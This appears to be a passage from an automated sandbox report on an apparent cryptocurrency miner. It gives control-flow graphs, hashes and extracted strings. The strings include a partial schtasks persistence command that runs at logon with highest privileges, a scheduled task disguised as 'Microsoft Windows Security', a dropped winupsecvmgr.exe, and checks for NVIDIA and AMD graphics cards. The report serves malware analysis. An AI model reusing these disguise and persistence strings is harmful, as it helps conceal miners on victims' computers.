                                                                                                                                                                                                      control_flow_graph 0 7ff6e69985c0-7ff6e69986b0 call 7ff6e698e3d0 call 7ff6e698d340 5 7ff6e69986b2-7ff6e69986d1 call 7ff6e69814f0 0->5 6 7ff6e69986d6-7ff6e69986e5 0->6 5->6 8 7ff6e6999d21-7ff6e6999dc7 6->8 9 7ff6e69986eb-7ff6e6998761 wcslen 6->9 10 7ff6e6998763-7ff6e6998787 call 7ff6e69814f0 9->10 11 7ff6e699878c-7ff6e6998793 9->11 10->11 13 7ff6e6998799-7ff6e6998813 11->13 14 7ff6e699881b-7ff6e69988db call 7ff6e69840a8 call 7ff6e6983360 call 7ff6e6983c50 memset 11->14 13->14 21 7ff6e699890d-7ff6e699891c 14->21 22 7ff6e69988dd-7ff6e6998908 call 7ff6e69814f0 14->22 24 7ff6e699895e-7ff6e699898b 21->24 25 7ff6e699891e-7ff6e6998956 21->25 22->21 26 7ff6e69989b6-7ff6e69989bd 24->26 27 7ff6e699898d-7ff6e69989b1 call 7ff6e69814f0 24->27 25->24 29 7ff6e69989bf-7ff6e69989f6 26->29 30 7ff6e69989fe-7ff6e6998a59 call 7ff6e6982b30 call 7ff6e6982b00 memset 26->30 27->26 29->30 35 7ff6e6998a8b-7ff6e6998a92 30->35 36 7ff6e6998a5b-7ff6e6998a86 call 7ff6e69814f0 30->36 37 7ff6e6998a94-7ff6e6998ac6 35->37 38 7ff6e6998acd-7ff6e6998b6e call 7ff6e6982b00 memset 35->38 36->35 37->38 42 7ff6e6998ba0-7ff6e6998ba7 38->42 43 7ff6e6998b70-7ff6e6998b9b call 7ff6e69814f0 38->43 45 7ff6e6998c6f-7ff6e6998d17 call 7ff6e6982b00 memset 42->45 46 7ff6e6998bad-7ff6e6998c67 42->46 43->42 49 7ff6e6998d49-7ff6e6998d61 45->49 50 7ff6e6998d19-7ff6e6998d44 call 7ff6e69814f0 45->50 46->45 52 7ff6e6998e1e-7ff6e6998e5a 49->52 53 7ff6e6998d67-7ff6e6998e16 49->53 50->49 54 7ff6e6998e85-7ff6e6998e8c 52->54 55 7ff6e6998e5c-7ff6e6998e80 call 7ff6e69814f0 52->55 53->52 57 7ff6e6998e8e-7ff6e6998ed4 54->57 58 7ff6e6998edc-7ff6e6998f46 call 7ff6e6982b30 call 7ff6e6982b00 memset 54->58 55->54 57->58 63 7ff6e6998f78-7ff6e6998f87 58->63 64 7ff6e6998f48-7ff6e6998f73 call 7ff6e69814f0 58->64 66 7ff6e6998fe9-7ff6e6999016 63->66 67 7ff6e6998f89-7ff6e6998fe1 63->67 64->63 68 7ff6e6999041-7ff6e6999048 66->68 69 7ff6e6999018-7ff6e699903c call 7ff6e69814f0 66->69 67->66 71 7ff6e699907f-7ff6e69990e2 call 7ff6e6982b30 call 7ff6e6982b00 memset 68->71 72 7ff6e699904a-7ff6e6999078 68->72 69->68 77 7ff6e6999114-7ff6e699911b 71->77 78 7ff6e69990e4-7ff6e699910f call 7ff6e69814f0 71->78 72->71 80 7ff6e6999156-7ff6e69991bf call 7ff6e6982b00 memset 77->80 81 7ff6e699911d-7ff6e699914f 77->81 78->77 84 7ff6e69991f1-7ff6e69991f8 80->84 85 7ff6e69991c1-7ff6e69991ec call 7ff6e69814f0 80->85 81->80 87 7ff6e699925e-7ff6e6999283 call 7ff6e6982b00 call 7ff6e6981ea0 84->87 88 7ff6e69991fa-7ff6e6999256 84->88 85->84 93 7ff6e69992b0-7ff6e69992b7 87->93 94 7ff6e6999285-7ff6e69992ab call 7ff6e69814f0 87->94 88->87 96 7ff6e69992e0-7ff6e6999348 93->96 97 7ff6e69992b9-7ff6e69992d8 93->97 94->93 98 7ff6e6999373-7ff6e699937a 96->98 99 7ff6e699934a-7ff6e699936e call 7ff6e69814f0 96->99 97->96 100 7ff6e6999380-7ff6e699941a 98->100 101 7ff6e6999422-7ff6e69994b1 call 7ff6e6983010 98->101 99->98 100->101 105 7ff6e69994b8-7ff6e69994ce call 7ff6e6984051 101->105 108 7ff6e69994ef-7ff6e69994f6 105->108 109 7ff6e69994d0-7ff6e69994ea call 7ff6e69814f0 105->109 111 7ff6e699950f-7ff6e699951c _wcsicmp 108->111 112 7ff6e69994f8-7ff6e699950b 108->112 109->108 113 7ff6e6999810-7ff6e6999813 call 7ff6e6982a50 111->113 114 7ff6e6999522-7ff6e6999528 111->114 112->111 117 7ff6e6999818-7ff6e699981b 113->117 114->113 116 7ff6e699952e-7ff6e6999533 call 7ff6e6983310 114->116 119 7ff6e6999538-7ff6e6999544 116->119 120 7ff6e6999823-7ff6e6999844 memcpy 117->120 119->120 121 7ff6e699954a-7ff6e699954c 119->121 124 7ff6e6999877-7ff6e699987e 120->124 125 7ff6e6999846-7ff6e6999872 memcpy call 7ff6e69814f0 120->125 122 7ff6e699954e-7ff6e6999551 121->122 123 7ff6e6999557-7ff6e699957b memcpy 121->123 122->105 122->123 126 7ff6e69995a8-7ff6e69995af 123->126 127 7ff6e699957d-7ff6e69995a3 memcpy call 7ff6e69814f0 123->127 129 7ff6e6999884-7ff6e6999a00 124->129 130 7ff6e6999a08-7ff6e6999a19 call 7ff6e69834f0 124->130 125->124 132 7ff6e69995b5-7ff6e6999720 126->132 133 7ff6e6999727-7ff6e699975c call 7ff6e6982990 126->133 127->126 129->130 138 7ff6e6999a23-7ff6e6999a47 memcpy 130->138 139 7ff6e6999a1b-7ff6e6999a1d 130->139 132->133 142 7ff6e6999d02-7ff6e6999d1c call 7ff6e69831c0 133->142 143 7ff6e6999762-7ff6e699976c 133->143 140 7ff6e6999a49-7ff6e6999a73 memcpy call 7ff6e69814f0 138->140 141 7ff6e6999a78-7ff6e6999a7f 138->141 139->105 139->138 140->141 145 7ff6e6999a81-7ff6e6999a88 141->145 146 7ff6e6999ae7-7ff6e6999b1e call 7ff6e6982990 141->146 142->8 148 7ff6e699976e-7ff6e699979e call 7ff6e69814f0 143->148 149 7ff6e69997a3-7ff6e69997aa 143->149 150 7ff6e6999a90-7ff6e6999ab0 145->150 160 7ff6e6999ce3-7ff6e6999cfd call 7ff6e69831c0 146->160 161 7ff6e6999b24-7ff6e6999b8b 146->161 148->149 154 7ff6e69997e8-7ff6e6999808 call 7ff6e6982990 149->154 155 7ff6e69997ac-7ff6e69997e1 149->155 150->150 157 7ff6e6999ab2-7ff6e6999adf 150->157 154->105 155->154 157->146 160->142 163 7ff6e6999b91-7ff6e6999c20 call 7ff6e69814f0 161->163 164 7ff6e6999c25-7ff6e6999c2c 161->164 163->164 167 7ff6e6999cc2-7ff6e6999cd9 call 7ff6e6982990 164->167 168 7ff6e6999c32-7ff6e6999cbb 164->168 170 7ff6e6999cde 167->170 168->167 170->105
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000026.00000002.2912630385.00007FF6E6981000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6E6980000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000026.00000002.2912554087.00007FF6E6980000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000026.00000002.2912705488.00007FF6E699A000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000026.00000002.2912760460.00007FF6E699C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000026.00000002.2912838239.00007FF6E69A3000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000026.00000002.2912838239.00007FF6E69A5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000026.00000002.2913246298.00007FF6E69A8000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_38_2_7ff6e6980000_conhost.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: memset$memcpy$_wcsicmpwcslen
                                                                                                                                                                                                      • String ID: %S /run /tn "Microsoft Windows Security"$%S <#ydcfdz#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest $0$5RK\E$APPDATA=$SYSTEMROOT=$USERPROFILE=$\BaseNamedObjects\dzemvzqxamm$\BaseNamedObjects\dzemvzqxamm$\BaseNamedObjects\vljmdnomkxppwbqz$\Google\Libs\$\Microsoft Windows Security\winupsecvmgr.exe$\Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft Windows Security$\System32$\WindowsPowerShell\v1.0\powershell.exe$\cmd.exe$\reg.exe$\schtasks.exe$e; }$eth$xmr
                                                                                                                                                                                                      • API String ID: 1321921031-4262344814
                                                                                                                                                                                                      • Opcode ID: b5543baefebd80a1949f10078365f8542758c06a20fd94f67aadc13bba522567
                                                                                                                                                                                                      • Instruction ID: 34f90d8bafba4612ccdfa1c49c2721cdce0f7eac41946f849c619cc3a6d115ff
                                                                                                                                                                                                      • Opcode Fuzzy Hash: b5543baefebd80a1949f10078365f8542758c06a20fd94f67aadc13bba522567
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5BD23E63D3D6C399F7125B29A8423B5B3E0AFA5784F445231D98CD26A3DF2FA145C30A
                                                                                                                                                                                                      Function 00007FF6E6981180 Relevance: 12.2, APIs: 8, Instructions: 195sleepstringCOMMON
                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                      control_flow_graph 225 7ff6e6981180-7ff6e69811ae 226 7ff6e69811b4-7ff6e69811d1 225->226 227 7ff6e6981450-7ff6e6981453 GetStartupInfoA 225->227 228 7ff6e69811e4-7ff6e69811ef 226->228 231 7ff6e6981460-7ff6e698147a call 7ff6e69965f0 227->231 229 7ff6e69811d3-7ff6e69811d6 228->229 230 7ff6e69811f1-7ff6e69811ff 228->230 235 7ff6e69811dc-7ff6e69811e1 Sleep 229->235 236 7ff6e69813f0-7ff6e6981401 229->236 232 7ff6e6981407-7ff6e6981416 call 7ff6e69965e8 230->232 233 7ff6e6981205-7ff6e6981209 230->233 242 7ff6e698141c-7ff6e6981437 _initterm 232->242 243 7ff6e6981224-7ff6e6981226 232->243 237 7ff6e6981480-7ff6e6981499 call 7ff6e6996600 233->237 238 7ff6e698120f-7ff6e698121e 233->238 235->228 236->232 236->233 251 7ff6e698149e-7ff6e69814a6 call 7ff6e6996630 237->251 238->242 238->243 245 7ff6e698143d-7ff6e6981442 242->245 246 7ff6e698122c-7ff6e6981239 242->246 243->245 243->246 245->246 248 7ff6e698123b-7ff6e6981243 246->248 249 7ff6e6981247-7ff6e698128f call 7ff6e698d7b0 SetUnhandledExceptionFilter call 7ff6e6996070 call 7ff6e698d530 call 7ff6e6996050 246->249 248->249 261 7ff6e69812a5-7ff6e69812ab 249->261 262 7ff6e6981291 249->262 264 7ff6e69812ad-7ff6e69812bb 261->264 265 7ff6e6981293-7ff6e6981295 261->265 263 7ff6e69812e7-7ff6e69812ed 262->263 269 7ff6e69812f3-7ff6e6981318 malloc 263->269 270 7ff6e69813d0-7ff6e69813da 263->270 268 7ff6e69812a1 264->268 266 7ff6e6981297-7ff6e698129a 265->266 267 7ff6e69812c0-7ff6e69812c2 265->267 266->267 271 7ff6e698129c 266->271 272 7ff6e69812d5-7ff6e69812de 267->272 273 7ff6e69812c4 267->273 268->261 276 7ff6e698135c-7ff6e6981390 call 7ff6e698d340 call 7ff6e69985c0 269->276 277 7ff6e698131a-7ff6e6981320 269->277 274 7ff6e69813dc 270->274 275 7ff6e69813e1-7ff6e69813e7 270->275 271->268 280 7ff6e69812e0 272->280 281 7ff6e69812d0-7ff6e69812d3 272->281 273->280 274->275 275->269 286 7ff6e6981395-7ff6e69813a3 276->286 278 7ff6e6981325-7ff6e6981355 strlen malloc memcpy 277->278 282 7ff6e6981357 278->282 283 7ff6e6981322 278->283 280->263 281->272 281->280 282->276 283->278 286->251 287 7ff6e69813a9-7ff6e69813b1 286->287 287->231 288 7ff6e69813b7-7ff6e69813c6 287->288
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000026.00000002.2912630385.00007FF6E6981000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6E6980000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000026.00000002.2912554087.00007FF6E6980000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000026.00000002.2912705488.00007FF6E699A000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000026.00000002.2912760460.00007FF6E699C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000026.00000002.2912838239.00007FF6E69A3000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000026.00000002.2912838239.00007FF6E69A5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000026.00000002.2913246298.00007FF6E69A8000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_38_2_7ff6e6980000_conhost.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: malloc$ExceptionFilterInfoSleepStartupUnhandledmemcpystrlen
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 649803965-0
                                                                                                                                                                                                      • Opcode ID: bef71663f6727e431b96fe150fb6a14801079257b7d8a09b9d0d6fdac41f2695
                                                                                                                                                                                                      • Instruction ID: 4d3c2a9ca1c51a745f87c6272f2c6049347882e63cbeac074e319288228af00c
                                                                                                                                                                                                      • Opcode Fuzzy Hash: bef71663f6727e431b96fe150fb6a14801079257b7d8a09b9d0d6fdac41f2695
                                                                                                                                                                                                      • Instruction Fuzzy Hash: F0815937E2868789FB609F66E44477963A1AF45B88F444035CA4DC33A3DE2FE845C70A
                                                                                                                                                                                                      Function 00007FF6E6981720 Relevance: 31.8, APIs: 10, Strings: 8, Instructions: 341COMMON
                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                      control_flow_graph 171 7ff6e6981720-7ff6e6981796 172 7ff6e69817d5-7ff6e69817e7 call 7ff6e69840c6 171->172 175 7ff6e69817e9-7ff6e69817eb 172->175 176 7ff6e69817a0-7ff6e69817cd call 7ff6e698402d 172->176 177 7ff6e69817f1-7ff6e6981824 175->177 178 7ff6e6981e30-7ff6e6981e3d 175->178 176->172 180 7ff6e6981850-7ff6e698185e 177->180 184 7ff6e6981e50-7ff6e6981e70 wcslen 178->184 182 7ff6e6981830-7ff6e6981835 180->182 183 7ff6e6981860-7ff6e6981867 180->183 185 7ff6e698183b-7ff6e698184a 182->185 186 7ff6e6981990-7ff6e69819b1 call 7ff6e6984045 182->186 187 7ff6e6981869-7ff6e69818a1 call 7ff6e69814f0 183->187 188 7ff6e69818a6-7ff6e69818ad 183->188 193 7ff6e6981e80 184->193 185->180 185->186 186->193 196 7ff6e69819b7-7ff6e6981a1a call 7ff6e6984075 call 7ff6e6983c50 memset 186->196 187->188 190 7ff6e698190c-7ff6e6981924 wcsncmp 188->190 191 7ff6e69818af-7ff6e6981904 188->191 190->182 195 7ff6e698192a-7ff6e6981988 call 7ff6e698405d 190->195 191->190 195->182 201 7ff6e698198e 195->201 204 7ff6e6981a1c-7ff6e6981a4c call 7ff6e69814f0 196->204 205 7ff6e6981a51-7ff6e6981a58 196->205 201->186 204->205 207 7ff6e6981a5a-7ff6e6981a97 205->207 208 7ff6e6981a9f-7ff6e6981acc wcscpy wcscat wcslen 205->208 207->208 209 7ff6e6981e08-7ff6e6981e1a 208->209 210 7ff6e6981ad2-7ff6e6981af0 wcslen 208->210 211 7ff6e6981af6-7ff6e6981b02 wcslen 209->211 212 7ff6e6981e20-7ff6e6981e2b 209->212 210->211 210->212 213 7ff6e6981b07-7ff6e6981b28 211->213 212->213 213->184 214 7ff6e6981b2e-7ff6e6981e00 wcslen * 2 call 7ff6e698402d * 2 call 7ff6e6984069 call 7ff6e6984045 * 2 213->214
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000026.00000002.2912630385.00007FF6E6981000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6E6980000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000026.00000002.2912554087.00007FF6E6980000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000026.00000002.2912705488.00007FF6E699A000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000026.00000002.2912760460.00007FF6E699C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000026.00000002.2912838239.00007FF6E69A3000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000026.00000002.2912838239.00007FF6E69A5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000026.00000002.2913246298.00007FF6E69A8000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_38_2_7ff6e6980000_conhost.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: memsetwcsncmp
                                                                                                                                                                                                      • String ID: %S /run /tn "Microsoft Windows Security"$%S <#ydcfdz#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest $0$X$\??\$`$explorer.exe$xmr
                                                                                                                                                                                                      • API String ID: 1181335886-2264807111
                                                                                                                                                                                                      • Opcode ID: 9340c56cd80f63489d28db57b46e1f31c9ba72a2ab9b3280ce8ad71af1fbfc60
                                                                                                                                                                                                      • Instruction ID: 6a9e8dc5753386b9f45c4a71bf658b04d082629ab0d483228741937af43361a0
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9340c56cd80f63489d28db57b46e1f31c9ba72a2ab9b3280ce8ad71af1fbfc60
                                                                                                                                                                                                      • Instruction Fuzzy Hash: F3025023928BC285E3218B25E4043AAB3A4FB957A4F404336DA9C97BE6DF3FD144C705
                                                                                                                                                                                                      Function 00007FF6E6982990 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 50COMMON
                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000026.00000002.2912630385.00007FF6E6981000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6E6980000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000026.00000002.2912554087.00007FF6E6980000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000026.00000002.2912705488.00007FF6E699A000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000026.00000002.2912760460.00007FF6E699C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000026.00000002.2912838239.00007FF6E69A3000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000026.00000002.2912838239.00007FF6E69A5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000026.00000002.2913246298.00007FF6E69A8000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_38_2_7ff6e6980000_conhost.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: memsetwcsncmp
                                                                                                                                                                                                      • String ID: \BaseNamedObjects\vljmdnomkxppwbqz$eth
                                                                                                                                                                                                      • API String ID: 1181335886-3208800472
                                                                                                                                                                                                      • Opcode ID: 0b5ccc7bbee36a88c8147fb3cb6218f60deec08863c1a95231d2b2b3d10a26d2
                                                                                                                                                                                                      • Instruction ID: c5ec39509be56a8ca8f20fa7e404cee1ccc1680372ce6aa65fd9c014d15a1c2c
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0b5ccc7bbee36a88c8147fb3cb6218f60deec08863c1a95231d2b2b3d10a26d2
                                                                                                                                                                                                      • Instruction Fuzzy Hash: E5010C23B2C64241F220E656E8007EA6651AFD5BD0F544235FE8D43BE6CE7ED546C709
                                                                                                                                                                                                      Function 00007FF6E6982A50 Relevance: 4.5, APIs: 1, Strings: 2, Instructions: 39COMMON
                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000026.00000002.2912630385.00007FF6E6981000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6E6980000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000026.00000002.2912554087.00007FF6E6980000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000026.00000002.2912705488.00007FF6E699A000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000026.00000002.2912760460.00007FF6E699C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000026.00000002.2912838239.00007FF6E69A3000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000026.00000002.2912838239.00007FF6E69A5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000026.00000002.2913246298.00007FF6E69A8000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_38_2_7ff6e6980000_conhost.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: wcslen
                                                                                                                                                                                                      • String ID: 0$eth
                                                                                                                                                                                                      • API String ID: 4088430540-242559905
                                                                                                                                                                                                      • Opcode ID: fefd0b51354c9b27353387df6e592b595b78b00b7a1f0cb1ba5a9e03abdbd47d
                                                                                                                                                                                                      • Instruction ID: 81750867d559a8360849e941e317f16bd72bd805e99267fd592871af98facf01
                                                                                                                                                                                                      • Opcode Fuzzy Hash: fefd0b51354c9b27353387df6e592b595b78b00b7a1f0cb1ba5a9e03abdbd47d
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5E01D22362868186E7109B50F85079BB760EFC4378F640325FA9C46AE6DF3FC5858B40

                                                                                                                                                                                                      Non-executed Functions

                                                                                                                                                                                                      Function 00007FF6E6981EA0 Relevance: 37.2, APIs: 9, Strings: 12, Instructions: 475COMMON
                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                      control_flow_graph 352 7ff6e6981ea0-7ff6e6981f16 call 7ff6e6996680 355 7ff6e6981f18-7ff6e6981f3e memcpy call 7ff6e69814f0 352->355 356 7ff6e6981f43-7ff6e6981f4a 352->356 355->356 358 7ff6e698208d-7ff6e69820bb wcslen memcpy 356->358 359 7ff6e6981f50-7ff6e6982086 356->359 360 7ff6e69820bd-7ff6e69820e3 memcpy call 7ff6e69814f0 358->360 361 7ff6e69820e8-7ff6e69820ef 358->361 359->358 360->361 363 7ff6e69820f5-7ff6e698222b 361->363 364 7ff6e6982232-7ff6e6982278 361->364 363->364 365 7ff6e698227a-7ff6e69822ca call 7ff6e69814f0 364->365 366 7ff6e69822cf-7ff6e69822d6 364->366 365->366 368 7ff6e698233c-7ff6e6982375 wcslen 366->368 369 7ff6e69822d8-7ff6e6982334 366->369 370 7ff6e69823ca-7ff6e69823d1 368->370 371 7ff6e6982377-7ff6e69823c5 call 7ff6e69814f0 368->371 369->368 373 7ff6e6982437-7ff6e69824a3 call 7ff6e69840ed 370->373 374 7ff6e69823d3-7ff6e698242f 370->374 371->370 377 7ff6e6982929 373->377 378 7ff6e69824a9-7ff6e69824ea 373->378 374->373 379 7ff6e698292b-7ff6e6982969 377->379 380 7ff6e69824f3-7ff6e6982517 call 7ff6e69840f9 378->380 383 7ff6e698251d-7ff6e6982589 call 7ff6e69840ed 380->383 384 7ff6e698291f-7ff6e6982924 call 7ff6e6983fdf 380->384 388 7ff6e69824f0 383->388 389 7ff6e698258f-7ff6e69825b6 call 7ff6e6984114 383->389 384->377 388->380 392 7ff6e69825bc-7ff6e69825ce 389->392 393 7ff6e6982910-7ff6e698291a call 7ff6e6983fdf 389->393 395 7ff6e6982610-7ff6e6982617 392->395 396 7ff6e69825d0-7ff6e698260b call 7ff6e69814f0 392->396 393->388 399 7ff6e6982619-7ff6e698267e 395->399 400 7ff6e6982686-7ff6e698269d _wcsnicmp 395->400 396->395 399->400 401 7ff6e698296a-7ff6e6982983 call 7ff6e6983fdf * 2 400->401 402 7ff6e69826a3-7ff6e69826aa 400->402 401->379 404 7ff6e69826ac-7ff6e69826cf call 7ff6e69814f0 402->404 405 7ff6e69826d4-7ff6e69826db 402->405 404->405 406 7ff6e69826dd-7ff6e6982704 405->406 407 7ff6e698270c-7ff6e6982723 _wcsnicmp 405->407 406->407 407->401 410 7ff6e6982729-7ff6e6982730 407->410 412 7ff6e698275a-7ff6e6982761 410->412 413 7ff6e6982732-7ff6e6982755 call 7ff6e69814f0 410->413 416 7ff6e6982763-7ff6e698278a 412->416 417 7ff6e6982792-7ff6e69827a9 _wcsnicmp 412->417 413->412 416->417 417->401 418 7ff6e69827af-7ff6e69827e4 417->418 419 7ff6e69827e6-7ff6e698284f call 7ff6e69814f0 418->419 420 7ff6e6982854-7ff6e698285b 418->420 419->420 422 7ff6e69828fc-7ff6e698290e wcsstr 420->422 423 7ff6e6982861-7ff6e69828f4 420->423 422->393 422->401 423->422
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000026.00000002.2912630385.00007FF6E6981000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6E6980000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000026.00000002.2912554087.00007FF6E6980000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000026.00000002.2912705488.00007FF6E699A000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000026.00000002.2912760460.00007FF6E699C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000026.00000002.2912838239.00007FF6E69A3000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000026.00000002.2912838239.00007FF6E69A5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000026.00000002.2913246298.00007FF6E69A8000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_38_2_7ff6e6980000_conhost.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: memcpy$wcslen
                                                                                                                                                                                                      • String ID: $0'$0$@$AMD$APPDATA=$ATI$Advanced Micro Devices$NVIDIA$ProviderName$ProviderName$\Registry\Machine\SYSTEM\CurrentControlSet\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\$\Registry\Machine\SYSTEM\CurrentControlSet\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\
                                                                                                                                                                                                      • API String ID: 1844840824-1300809496
                                                                                                                                                                                                      • Opcode ID: 5b5f1375f3de931362796e278fad743eef0130830d29893e114e696d61781ae2
                                                                                                                                                                                                      • Instruction ID: dadb78adadb9838255120093c7213fb352017a2932d187341535366e5802334c
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5b5f1375f3de931362796e278fad743eef0130830d29893e114e696d61781ae2
                                                                                                                                                                                                      • Instruction Fuzzy Hash: E9521026D3CAD395F7129B29A8513B5A3A1AFA1384F045335D98CD2673EF2FA145C30E
                                                                                                                                                                                                      Function 00007FF6E698EE40 Relevance: 31.7, APIs: 21, Instructions: 232memoryCOMMON
                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                      • Not Executed
